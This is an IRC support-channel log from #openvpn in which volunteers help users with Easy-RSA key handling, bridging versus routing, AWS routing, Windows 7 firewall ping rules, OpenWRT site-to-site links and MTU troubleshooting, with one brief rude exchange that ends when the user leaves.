seconds] 15:00 < rob0> Another tip: if possible, your CA key and PKI files should not be on the VPN server. 
15:00 < rob0> (Ideally not on the VPN at all.) 15:00 < benkay> thanks, rob0 15:00 < rob0> yw 15:00 < benkay> i'll take all the tips you care to share 15:00 < pekster> rob0: Oh, btw, generation of keypairs off the CA system gets easier in my codebase too :) 15:01 < benkay> well, then. let's return to the original question: what kind of dumb am I engaging in that `source ./vars` followed by `./clean-all` returns `please source the vars script first` ? 15:01 < pekster> If you're running it through sudo, your environment has changed 15:01 < pekster> 'vars' just puts the configuration Easy-RSA expects into the environment, so changing users messes with that 15:01 < benkay> makes sense. 15:02 < pekster> Don't run it through sudo. Better yet, take the time to create a new account, maybe call it 'pki' or such. Then you perhaps start your PKI tasks by first doing: sudo su - pki 15:02 < pekster> Enter your user's sudo password, and you elevate (as root) to become that user. *then* you source vars and continue as normal, doing everything as the pki user 15:03 < benkay> awesome. 15:03 < benkay> that makes a whole lot of sense. 15:03 < benkay> I really appreciate your patience. 15:03 < rob0> I just have my CA in my regular user account. 15:04 < pekster> Depends on what you use the box for. I have a dedicated 'admin' host, and PKI tasks are all handled by a role account. Then again, I like the separation of duty :) 15:05 < rob0> if my user account got pwn3d, I'd be in a world of hurt :) 15:05 < pekster> Not as much that, but I don't normally even *want* access to read/backup/overwrite/destroy those files unless I am specifically performing PKI tasks 15:05 < rob0> and that's true on more than one system, unfortunately 15:06 -!- tcamuso_ [tcamuso@nat/redhat/x-stzdjglvmiahqwgn] has quit [Ping timeout: 258 seconds] 15:06 < rob0> At least my SSH keys are encrypted with not likely guessable passphrases. 
15:07 < pekster> <3 ssh-agent 15:07 < pekster> Of course, I'm OCD about my interactive login security, so SSO is nice 15:09 < benkay> so here's my plan. double check if you're willing? 15:10 < benkay> create user pki, give strong password, sudo su - pki, `source ./vars` `./clean-all` etc 15:10 < benkay> do all open vpn stuff as user pki 15:11 < pekster> You don't need to give the account any password if you'll su into it 15:11 < benkay> the more you know! 15:11 < benkay> thanks, pekster. 15:11 < pekster> Otherwise, yes 15:11 < benkay> groovy. 15:12 < benkay> let's try it! 15:12 < pekster> You could do it as your user too as rob0 noted. I like unique accounts for sensitive ops, but there's no single or "right" way to do most of this 15:13 < pekster> Some people use removable media for their PKI (USB stick or such) so it can be kept offline. Some use a completely disconnect computer not even online. All depends on your goals and security needs 15:14 < benkay> i'm running this all in /etc/openvpn/easy-rsa, which out of the box does not permit my pki user to create things 15:14 < pekster> You shouldn't do that (did you miss the big warning to this end in the vars comments?) Copy it somewhere else 15:14 < pekster> Probably under /home/pki/ in your setup 15:17 < digilink> hey guys... have a ?. I am thinking about deploying an OpenVPN tap point to point VPN for layer 2 convenience from one location to another. I will be running Debian linux on either side, the server side only has one nic which is attached to the subnet I am trying to extend, but the client side will have two nic's, one for an already established network, and the other dedicated to the VPN that 15:17 < digilink> I would like to attach to a switch. Im at a bit of a loss on what to do on the client side however, will I need to bridge the TAP interface like on the server and then just plug it into the switch? 
I am wanting to do full layer 2 (DHCP, local DNS, etc) back to my subnet at the server side is my goal... 15:18 < pekster> !bridging 15:18 <@vpnHelper> "bridging" is (#1) Using bridges is either completely stupid or clever. It is stupid if you do it because you think it is easier. It is clever if you're a network knowledgeable person who understands networking very well and knows why routing won't fit for you or (#2) See also https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 15:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:18 < pekster> The guide may be useful. In short, you create a bridge interace that holds the IP you want to use and add the NIC and tap device to the bridge as members 15:19 < rob0> Removable media for a PKI is a great idea. What is NOT a good idea is for that media to be a VM image. :) It's better to run easy-rsa in Windows than to run it on a virtual machine with no decent entropy source. 15:19 < benkay> ah, I see. and then when I edit the config files for my tcp/udp instances, i'll point at the keys in /home/pki/whatever 15:19 < rob0> (I mention this because I had to talk a client out of doing that once.) 15:19 < pekster> rob0: Yea, same issue with bootable liveCDs and such too actually. Even if you boot it on a system with a reak disk, it won't generally have built up much/any useful entropy if it's a one-shot setup 15:19 < digilink> pekster: thanks, that's what I thought. so I would just create the bridge on the client side and assign the IP to it? 15:20 < pekster> Yup 15:20 < digilink> gotcha.... thanks much :) 15:21 < pekster> If it's just between those 2 systems you can just statically define it. 
Then you can either manage the tap device in your OS on boot and tell OpenVPN to use tap0 specifically (not just a dynamic tap which would create tap1 if tap0 exists) or you can let openvpn dynamically manage it and use a script to add the device to the bridge 15:22 < pekster> It's often a less complex setup to use routing and a DHCP forwarder, but it sounds like you have a clue already and may want bridging for other reasons so I won't scold you too much for that :) 15:22 < digilink> one other thing, the bridge interface will need to be on the same subnet as I am attempting to extend correct? or do they need to be unique like in a routed setup? 15:22 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 15:23 < pekster> You generally want them on the same subnet, yes. Technically you can have as many subnets on a L2 network as you want, but that's not often done 15:23 < pekster> For instance, I'm running an IPv4 and IPv6 subnet at home, both on the same broadcast domain. I could just as easily add another IPv4 network too, if I wanted 15:23 < digilink> this should be fun hehe... I'm doing routing now and it works, but having full layer 2 would be nice :) 15:24 < pekster> If it's just DNS/DHCP, I'd suggest routing is better with a dhcp forwarder agent at the remote site. But, your call of course 15:24 < digilink> not sure how my bandwidth will hold up either, I have 30/6 on one end, 16/4 on the other 15:25 < pekster> Remember that local LAN clients will get fed the default gateway across the VPN, so if the link goes down, so does their Internet access (unless you're handling that specially with DHCP classes and handing out different gateways, in which case you really shouldn't be bridging to begin with) 15:25 < digilink> Ill definitely experiment, in the end the routed setup may be better. 
the biggest thing I'm after would be able to see my NAS', bonjour devices, printers, etc 15:26 < pekster> Yea, sounds to me like you should set up DNS properly, not bridge 15:26 < digilink> DNS is working, I can connect to things now, but wanted to push the envelope by trying out TAP as I've never done it 15:34 -!- brute11k [~brute@89.249.231.173] has quit [Quit: Leaving.] 15:44 < benkay> would someone confirm this for me? client certificates need to reside in /etc/openvpn/keys/, correct? 15:45 < rob0> Your config defines where your certificates should be. If it contains a "cd /etc/openvpn" (as is very common) you would use paths relative to /etc/openvpn in the rest of the config. 15:46 < benkay> thanks rob0. 15:46 < rob0> Technically you can put any files anywhere you want, but /etc/openvpn is a sane standard. 15:46 < benkay> clarification: the files that remain on the vpn server are the "certificates", correct? I've already verified that I don't want to leave the "keys" on there. 15:47 < rob0> The server needs its own key, dhparam, its own cert, and the CA cert. 15:47 < benkay> ah ha 15:47 < rob0> Clients need their own key and cert, and the CA cert. 15:49 < benkay> but the server doesn't need the client certs? 15:50 < benkay> oh of course not if i signed them during generation on the server 15:50 < benkay> ... 15:50 < benkay> right? 15:51 < pekster> The server does not need any client certs. It verifies a client is valid by checking the signature on the cert the client hands over against the server's ca.crt file 15:55 < benkay> cool. that's what I thought. 16:01 < hrenovo> pekster: you were right, it was the client side firewall. I turned it off entirely and now I can ping the client where the firewall is turned off from both the server, and another client. 16:02 < hrenovo> So instead of turning windows 7 firewall off, what rule should be added in windows 7 firweall to allow client-to-client communication including ping ? 
16:03 < pekster> Turn it off on the interface? 16:03 < pekster> And maybe go find yourself an OS that lets you edit the firewall rules properly? 16:04 -!- teknoprep [~quassel@unaffiliated/teknoprep] has joined #openvpn 16:04 < teknoprep> hi all 16:04 < teknoprep> i have installed openvpn AMI on EC2 16:04 < teknoprep> i am unable to route traffic unless i use NAT 16:05 < pekster> In the network control deal you can turn on/off the firewall per-interface. I often just allow inbound traffic by interface since I mostly trust the VPN. In theory that allows other clinets to pound your open services (which on Windows, might be more than you think.) Again, the "right" solution is to secure your services, possibly by running an OS that handles it better 16:05 < pekster> teknoprep: Where are you expecting to route to? Unless you set up an internal network of VMs that's aware of the return route for the VPN network, that's completely normal 16:06 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Ping timeout: 256 seconds] 16:06 < teknoprep> i setup a static route on the box i am attempting to access... this route points to the LAN ip of the OpenVPN EC2 server.... this OVPN server is running on the same subnet... so traffic would be as follows ... Rmote Client ---- OVPN External IP NAT'd to OVPN Internal IP ---- OVPN BOX LAN --- Some Server on same LAN 16:07 < teknoprep> so on the box that is on the same subnet in EC2 as OVPN... i have already setup the static route for the Remote Client Network 16:07 < pekster> You need to set up an internal netwnonrk on AWS's side; AWS won't route private IP space for your VPNs for you 16:08 < teknoprep> i have an internal network on the AWS side 16:08 < teknoprep> 10.254.1.0/24 16:08 < teknoprep> OVPN is 10.254.1.10 ... my other server is 10.254.1.9 16:08 < pekster> Ah, k. 
Then a proper return route for your $VPN_NET/$CIDR via 10.254.1.10 should do it, plus relevant firewall rules and routing on the server 16:08 < pekster> Basically, all of this: 16:08 < pekster> !serverlan 16:08 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 16:09 < pekster> (assuming OpenVPN as your server on the EC2 host) 16:09 < pekster> Otherwise see !clientlan 16:09 < teknoprep> route add -net j10.2.1.0 netmask 255.255.255.0 gw 10.254.1.10 16:09 < teknoprep> i have already done that 16:09 < pekster> There's a lot more on that troubleshooting flowchart than that... 16:10 < teknoprep> i have already done your flowchart 16:10 < pekster> Follow each step, and if you're still confused, start tcpdumping packet flow 16:10 < teknoprep> i enabled routing on OpenVPN 16:10 < pekster> Well, then what part did you determine was the problem? 16:10 < teknoprep> i disabled the firewall compeletely 16:10 < teknoprep> i believe the OpenVPN box is not routing traffic properly 16:10 < pekster> The flowchart ends with you successfully being able to ping things 16:10 < teknoprep> from one network to another 16:10 < pekster> So, how can you have "done the flowchart" and still have problems 16:11 < pekster> So, enable routing? Like the bot output says? 16:11 < pekster> !ipforward 16:11 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. 
it must be enabled in the kernel AND allowed in the firewall 16:11 < teknoprep> i can ping from my remote network to the OpenVPN box... all IP's of it... both LAN IP's and OVPN routed networking ip's 16:11 < pekster> Okay, great. That's step 1. 16:11 < pekster> (well, and 2) 16:11 < teknoprep> from the other AWS server i can ping the LAN ip of the OVPN server 16:11 < teknoprep> the route is already configured on my remote client 16:12 < pekster> Via a push from the server, to the peered VPN IP? 16:12 < teknoprep> i believe so... i can't find that option in the OpenVPN Web Admin 16:12 < pekster> "Web Admin" 16:12 < teknoprep> other than setting the remote network subnet 16:12 < teknoprep> OpenVPN Access Server 16:12 < pekster> If you're using "Access Server" you're in the wrong place. This channel is for the GPL OpenVPN project, not the commercial closed-source thing 16:12 < teknoprep> is what i am using 16:13 < pekster> !as 16:13 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 16:13 < pekster> We deal with the open-source project only here 16:13 < teknoprep> bah... i'll load up an openVPN server then 16:13 < teknoprep> i thought this was the same thing 16:13 < pekster> Nope. There's absoutely no "Web GUI" in the GPL side :) 16:13 < teknoprep> i use PFsense Gui 16:13 < pekster> It's also open-source and free to use, contribute, and modify 16:14 < rob0> !pfsense 16:14 <@vpnHelper> "pfsense" is dont use the web gui for configuring openvpn, you need to understand the config and logfiles 16:14 < teknoprep> yes i understand what GPL CDDL and whatelse 16:14 < pekster> AS is for people who want to pay for support and pretty UIs. Which is fine if that's the goal (it's not mine) :) 16:14 < pekster> IIRC you get for free "5 users for testing" or something. 
I never bothered to read far enough to find out what "testing" is defined to be, legally 16:14 < teknoprep> your at this point useless 16:15 < teknoprep> keep praising your "i hate web gui's" 16:15 < rob0> heh 16:15 < teknoprep> i didn't come here to debate free vs paid 16:15 < pekster> You're in the wrong channel if you want help with a frontend. It could be worse: I could turn out to be RMS :D 16:15 < rob0> You should not plan to come into a channel and ask for help, then call the helpers "useless". 16:16 < pekster> Now, I'll go take my useless self and go to some development work. You know, on OpenVPN 16:16 < rob0> It never ceases to amaze me how many people think that works! 16:16 < rob0> Guess what? It usually backfires. 16:16 < teknoprep> thanks for the life lesson 16:17 < teknoprep> i'll now change my attitude towards all people who like to be argumentative yet still useless 16:17 < rob0> teknoprep, you're useless to us also, FWIW. Want to work on my car for me? 16:17 < teknoprep> i agree 16:17 < teknoprep> i didn't come here giving anything back 16:17 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Ping timeout: 240 seconds] 16:18 < teknoprep> i do like how you are defending the average attitude of most IRC users 16:19 < pekster> No one expects that. We do expect relative politeness though. 16:20 < teknoprep> so i should do what you do and just compeletely stop the conversations i have with people when i do not agree with the conversation topic and then change it to what i think is right 16:20 < teknoprep> ?? 16:20 < rob0> "your[sic] at this point useless" does not meet the politeness test. Perhaps you could say: "Oops, you're right, I am sorry." 16:21 < rob0> but anyway, I have to go work on the car :( 16:21 < teknoprep> pay someone else to do it 16:21 < rob0> can't afford it 16:21 < teknoprep> you seem bright 16:21 < teknoprep> why waste time on a car... 16:23 < teknoprep> investing time into something that makes money is more valuable... 
i would in your situation find a way to make money with your time so that you can afford it 16:23 < teknoprep> putting time into a car is a waste worse than the money you would spend getting it fixed.. in almost every situation 16:25 -!- mode/#openvpn [+o pekster] by ChanServ 16:25 <@pekster> Last warning 16:26 < teknoprep> lol 16:26 < teknoprep> later 16:26 -!- teknoprep [~quassel@unaffiliated/teknoprep] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 16:26 -!- mode/#openvpn [-o pekster] by ChanServ 16:26 * jzaw 16:26 < pekster> Self-solving problem, apparently. 16:26 < digilink> trolls are fun 16:26 < digilink> :/ 16:26 < pekster> Moreso when they self-ban too :) 16:26 < pekster> Saves me a command 16:26 < digilink> hehe indeed :) 16:27 < jzaw> i was going blue from holding my breath for when he'd give up 16:27 < digilink> same here lol 16:28 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 16:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 276 seconds] 17:11 -!- master_o1_master [~master_of@p4FF24555.dip.t-dialin.net] has joined #openvpn 17:14 -!- master_of_master [~master_of@p4FF24B99.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 17:19 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 17:22 -!- corretico [~luis@190.211.93.38] has quit [Read error: No route to host] 17:27 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 17:41 < jzaw> ping pekster 17:44 < jzaw> what happens [bad?] if im routing via taps rather than tuns ? 17:45 < jzaw> i get that for bridging id have to use tap 17:46 < Aprogas> You are working on a different network layer if you do that. 
17:46 < jzaw> is there any advantage to routing on tuns than taps 17:46 < Aprogas> In certain situations, probably. 17:46 < Aprogas> If you feel tap better suits your purposes, then use that. 17:46 < jzaw> 30B overheads ? things like that? 17:47 < jzaw> well ... tap just takes two ips ... one each end from a /30 .. no need for topology or owt 17:47 < jzaw> seems easier 17:47 < Aprogas> I only use OpenVPN to make some SNMP-servers reachable from a central monitoring software, without having to run those SNMP-server listening on the public internet (they run as root after all). 17:48 < jzaw> ive managed to get a /29 for the client lan and /30 for the taps 17:48 * jzaw nods 17:48 < Aprogas> So I only care about transmitting UDP and not about IP, so tun seemed fine for my purposes. 17:49 < jzaw> ive done this for my FiL so that even if the isp take his pub ip off him (me) ill still be able to get in and admin his kit 17:49 < jzaw> im using tcp 17:49 < jzaw> cos its about 2,000km+ 17:49 < jzaw> and ive found voip to be less artifacty / poppy / lossy with a tcp tun 17:50 < jzaw> even though voip itself is udp 17:52 < Aprogas> I have to go. 17:52 < jzaw> 0/ 17:56 -!- dlucio [~dieu@CPEbcc8100f9978-CMbcc8100f9975.cpe.net.cable.rogers.com] has quit [Quit: Konversation terminated!] 
17:56 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:01 -!- mallxs [~mallxs@84.246.31.190] has quit [Read error: Connection reset by peer] 18:02 -!- mallxs [~mallxs@84.246.31.190] has joined #openvpn 18:05 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 18:06 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 18:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 18:15 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:24 -!- master_o1_master [~master_of@p4FF24555.dip.t-dialin.net] has quit [Read error: Operation timed out] 18:26 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 18:29 -!- master_of_master [~master_of@p4FF24A9A.dip.t-dialin.net] has joined #openvpn 18:34 -!- master_o1_master [~master_of@p4FF24A9D.dip.t-dialin.net] has joined #openvpn 18:34 -!- master_of_master [~master_of@p4FF24A9A.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 18:41 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 18:41 < hrenovo> hello again everyone 18:41 < hrenovo> I come with questions again ) 18:51 < Poster> I'm guessing the question would get you closer to the answer 18:54 -!- MaynardWaters [~asdfjkl@c-71-238-30-69.hsd1.mi.comcast.net] has quit [Remote host closed the connection] 19:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:09 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 272 seconds] 19:10 -!- meepmeep [meepmeep@212.24.104.229] has joined #openvpn 19:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:19 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.4.0] 19:20 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:22 -!- Volkswagner 
[~eric@cpe-24-161-55-139.hvc.res.rr.com] has joined #openvpn 19:23 < hrenovo> Poster: hi ) 19:23 < hrenovo> https://forums.openvpn.net/topic12479.html 19:23 <@vpnHelper> Title: OpenVPN Support Forum openvpn server cannot ping the client : Server Administration (at forums.openvpn.net) 19:23 < hrenovo> I have been typing my question on the forums. 19:23 < hrenovo> sorry for the delay 19:24 < hrenovo> my nick there is vmlxnetwork 19:27 < Poster> try tcpdump on the openvpn server 19:27 < Poster> you can also check arp cache 19:28 < Poster> since you can ping the server, you have layers 2 and 3 in place 19:29 -!- master_o1_master [~master_of@p4FF24A9D.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 19:30 < hrenovo> Poster: tcpdump ? 19:31 -!- master_of_master [~master_of@p4FF24F9F.dip.t-dialin.net] has joined #openvpn 19:33 < Poster> http://www.tcpdump.org/ 19:33 <@vpnHelper> Title: TCPDUMP/LIBPCAP public repository (at www.tcpdump.org) 19:33 < hrenovo> install tcpdump on the server? 19:34 < Poster> what OS is the server? 19:34 < hrenovo> Debian 6 19:34 < Poster> sudo apt-get install tcpdump 19:35 < hrenovo> installed 19:36 -!- master_o1_master [~master_of@p4FF24D22.dip.t-dialin.net] has joined #openvpn 19:37 < Poster> ok so what is the interface name you're using for VPN clients? 
19:37 < hrenovo> tun0 19:38 < Poster> ok so type 19:38 < Poster> sudo tcpdump -i tun0 icmp 19:38 < Poster> then in another window try to ping a client 19:38 < Poster> you'll probably see the icmp echo request leave, but no response 19:39 -!- master_of_master [~master_of@p4FF24F9F.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 19:42 -!- master_of_master [~master_of@p4FF24C20.dip.t-dialin.net] has joined #openvpn 19:44 < hrenovo> Poster: yup I see it there 19:44 < hrenovo> Poster: but no ping reply in the other putty window 19:44 < hrenovo> 20:41:48.065570 IP 10.8.0.1 > 10.8.0.6: ICMP echo request, id 11444, seq 1, length 64 19:45 -!- master_o1_master [~master_of@p4FF24D22.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 19:46 < Poster> which corresponds to the no response 19:47 < hrenovo> 10.8.0.6 19:47 < hrenovo> pinging from 10.8.0.1 to 10.8.0.6 19:48 -!- jaded-g0n [~root@113.210.96.159] has joined #openvpn 19:48 -!- raidz is now known as raidz_away 19:48 < jaded-g0n> hello 19:48 < jaded-g0n> anyone here? 19:48 < jaded-g0n> i need some love and help 19:49 -!- jaded-g0n [~root@113.210.96.159] has quit [Client Quit] 19:49 -!- jaded-g0n [~pizo@113.210.96.159] has joined #openvpn 19:50 < Poster> ask away 19:51 < Poster> hrenovo: what you're seeing corresponds to some type of packet filtering on the client side 19:52 < hrenovo> Poster: comparing to the tcpdump where there is a reply, I can clearly see in the output that there is only request, but no reply. 19:52 < Poster> hence the request being sent but blocked and not responded to 19:53 < hrenovo> basically, what do they normally do windows7 clients ? 
19:53 -!- benkay [~benkay@67.50.19.230] has quit [Quit: benkay] 19:53 < Poster> yep 19:53 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:53 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:53 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:54 -!- mode/#openvpn [+o krzee] by ChanServ 19:54 < hrenovo> I guess my question is not clear 19:55 < hrenovo> I have 2 windows 3 windows 7 clients. I'm sure there are many others using windows 7 as openvpn clients 19:56 < Poster> windows 7 firewall is on by default 19:56 < Volkswagner> greetings 19:56 < Volkswagner> I have a working server on Netgear WNDR3800 running OpenWRT Backfire 19:56 < hrenovo> so what do they normally do in the firewall of windows 7 clients to make it pingable without having to turn off the firewall for openvpn TAP interface? 19:57 < Poster> you'd have to make an exception 19:57 < Poster> http://answers.microsoft.com/en-us/windows/forum/windows_7-networking/how-to-enable-ping-response-in-windows-7/5aff5f8d-f138-4c9a-8646-5b3a99f1cae6 19:57 <@vpnHelper> Title: How to enable ping response in windows 7 - Microsoft Community (at answers.microsoft.com) 19:58 < Volkswagner> Windows clients connect via OpenVPN GUI, server config = http://pastebin.com/ThFiy9tc 20:00 < Volkswagner> Clients are behind dsl router/modem Dlink DSL-2750 20:01 < Volkswagner> Is it possible to install a second router (WNDR3700 running openwrt) behind the Dlink to act as the client with several devices hard wired so they all can be clients? 20:01 < Volkswagner> I'm not sure if this is a standard setup or not. 20:03 < Volkswagner> The WNDR3700 would be strictly for clients needing to connect to the VPN only. 20:03 < Poster> are you talking about a WNDR3700 linking to the existing OpenVPN server and bridging the networks? 
20:04 < Volkswagner> Poster, I believe you are correct
20:04 < Volkswagner> The clients will actually be ip phones
20:05 < Poster> yes you can do that, though you will need to work out some addressing method
20:05 < Poster> when linking LANs together, you may want to consider the tun adapter type and route subnets across
20:05 < Volkswagner> or the WNDR 3700 would be the sole client, right?
20:05 < Poster> versus the common tap method for mobile clients
20:05 < Poster> well I'm assuming with ip phones you'd want full routing between the phones and remote network
20:06 < Poster> if you don't do that, the WNDR3700 would have to perform NAT across the VPN link
20:06 < Poster> so all remote clients would appear to be 1 IP address, in some cases that is ok, though I am unsure how your phones will behave
20:07 < Volkswagner> Could I hard code individual addresses to the ports on the WNDR3700?
20:07 < Poster> are you talking about DHCP on the LAN side?
20:08 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep]
20:08 < Volkswagner> Originally I thought I could "bridge" the WNDR 3700 and have the ports act like a switch getting DHCP from the VPN Server like current clients do.
20:09 < Volkswagner> DHCP that is :)
20:10 < Poster> bridging is a possibility, but it can cause trouble if there is a lot of broadcast traffic
20:10 < Poster> unless you specifically need a bridge, routing is a more efficient solution
20:10 < Poster> in a routed solution, you would have two separate subnets on each side, then the OpenVPN link would tie the two together
20:10 < Volkswagner> I still need to learn the difference. Been reading, but it's just not sinking in
20:11 < Poster> ok in a bridge, the same IP range exists for LAN and VPN clients
20:11 < Poster> if a LAN client sends out a broadcast packet, that broadcast traffic will reach all the VPN clients
20:12 < Poster> you can really think of it as a long, slower line directly into the remote network
20:12 < Volkswagner> OK, so my current setup is bridged.
20:12 < Poster> a routed connection does not pass any broadcast traffic, there are unique subnets (even small ones!) separating the two
20:13 < Volkswagner> Functionally I don't really need bridged. No file sharing, etc.
20:13 < Poster> it doesn't mean you can't access it, it just means it's one big subnet
20:13 < Poster> for your example, you could have a routed connection like this:
20:14 < Poster> 192.168.0.0/24 <-OpenVPN Server-> 10.0.0.1 <-[OpenVPN Link]-> 10.0.0.2 <-OpenVPN Client-> 192.168.1.0/24
20:14 < Poster> so a client in 192.168.0.0/24 can ping a system in the 192.168.1.0/24 network
20:14 < Poster> if you were to trace from say 192.168.0.10 to 192.168.1.10, it would be
20:14 < Poster> 192.168.1.1 (LAN side of OpenVPN server)
20:15 < Poster> 10.0.0.2 (Remote side of OpenVPN link, on OpenVPN Client)
20:15 < Poster> 192.168.1.10 (Remote host)
20:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
20:18 < Volkswagner> Poster, would 10.0.0.2 be on the Dlink LAN, or would the Dlink still need to be a different network?
20:19 < Poster> so in that example, the 10.0.0.2 would be the OpenVPN client
20:19 < Poster> on the WNDR3700
20:19 < Poster> you can really break it into smaller pieces
20:19 < Poster> forgetting the two networks, you have your OpenVPN link between Dlink and WNDR3700
20:19 < Poster> the Dlink is 10.0.0.1 and WNDR3700 is 10.0.0.2
20:20 < Poster> they can ping each other, ssh, whatever across that link
20:20 < Poster> all we're doing is using that link to route a subnet back and forth
20:20 < Poster> so Dlink has a route to 192.168.1.0/24 via 10.0.0.2 (WNDR3700)
20:20 < Poster> and WNDR3700 has a route to 192.168.0.0/24 via 10.0.0.1 (Dlink)
20:23 < Volkswagner> The OpenVPN link is between WNDR3700 and WNDR3800, isn't it?
20:23 < Poster> yep
20:24 < Poster> you just use that link to pass the network traffic between them
20:25 < Volkswagner> Poster, this is most helpful...
20:26 < Poster> once you get the building blocks in place you can do a lot of cool stuff
20:26 < Volkswagner> The WNDR3700 can have DHCP turned on so multiple clients in 192.168.1.0/24 can utilize the link, right?
20:26 < Poster> yep
20:27 < Poster> you'd treat them just like you were sharing out an Internet link
20:27 < Poster> except it has a route (via the OpenVPN link) to the remote LAN too
20:27 -!- spacedust [~info@unaffiliated/cosmicblue] has joined #openvpn
20:28 < spacedust> i've read it on a site that for shorter distances between vpn server and client i should use UDP and for longer TCP
20:28 < spacedust> how much is longer ? :)
20:28 < spacedust> in miles milliseconds / or how ? :) if true at all :)
20:29 < Poster> it's one of those "depends" answers
20:29 < Volkswagner> spacedust, interesting... if my clients are only ip phones, all traffic is UDP :)
20:29 < Poster> UDP is lighter, as a result faster, but doesn't do any type of error correcting
20:30 < Poster> it also can sometimes have trouble with some implementations of NAT that timeout UDP sessions too quickly
20:30 < Poster> since there is no handshake and sequencing numbers, connection tracking just has to give it a timeout of outbound and (inverted) inbound traffic
20:31 < Poster> TCP is heavier, a bit slower, does error correcting and is not as likely to be subject to trouble with NAT
20:31 < spacedust> and what is the difference in overhead ?
20:32 < spacedust> tried to calculate my MTU :)
20:34 < Volkswagner> Poster, thanks so much. I'm off to find documentation, while I wait for the WNDR3700 to arrive.
20:35 < Poster> ok sounds good, you can also use computers to simulate/setup things as well, though as you've found, there's several solid state devices that can as well
20:35 < Poster> spacedust: unless you're running something that requires the fragment bit to not be set, you probably don't need to worry about setting your MTU
20:35 < Volkswagner> Oh, do you know of any free simulators?
20:36 < Volkswagner> I do have some space on a VM host
20:36 < spacedust> Poster: hmm
20:36 < Poster> Linux is probably going to be closest to what you're working with
20:36 < Poster> BSD is also good
20:37 < Poster> Linux is probably more popular
20:37 < spacedust> Poster: well first of all i might be connecting via pppoe then wifi then vpn so thats why i was thinking about mtu
20:37 < Poster> there's built in mechanisms to cope with frames that are too large
20:38 < Poster> if in doubt you can perform a tcpdump/wireshark capture and see if you get fragmentation needed frames
20:39 < spacedust> Poster: wow now this is fascinating :)
20:40 < spacedust> my mtu is 1492 thus i cant ping anything besides my wifi with anything higher :)
20:40 < spacedust> BUT ! now i made a vpn connection and i can ping with 1500 , i mean 1472 ...
20:40 < spacedust> so what is going on now ? :) cause im a bit in the shade here ...
20:41 < spacedust> so actually the vpn made my connection better ? :) instead of 1492 my mtu is now 1500 ? :) hooooow ? :)
20:41 < Poster> not likely, it's probably being fragmented and reassembled
20:42 -!- hrenovo_ [~hrenovo@ool-4352bbfe.dyn.optonline.net] has joined #openvpn
20:42 < Poster> what OS are you running on either side?
20:43 < spacedust> Poster: linux both sides, and im using ping with -M do
20:44 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer]
20:45 < Poster> ok you can do this
20:45 < spacedust> what ?
20:45 < Poster> sudo iptables -A INPUT -p icmp --icmp-type fragmentation-needed -j LOG --log-prefix "IPT ICMP Frag Needed: "
20:45 < Poster> sudo iptables -A OUTPUT -p icmp --icmp-type fragmentation-needed -j LOG --log-prefix "IPT ICMP Frag Needed: "
20:45 < Poster> and watch syslog for fragmentation needed
20:45 < spacedust> on the client ?
20:45 < Poster> either side
20:49 < spacedust> i added it on the client
20:49 < spacedust> did -M dont 14000 should be fragmented
20:49 < spacedust> and there is no sign in dmesg nor /var/log/messages
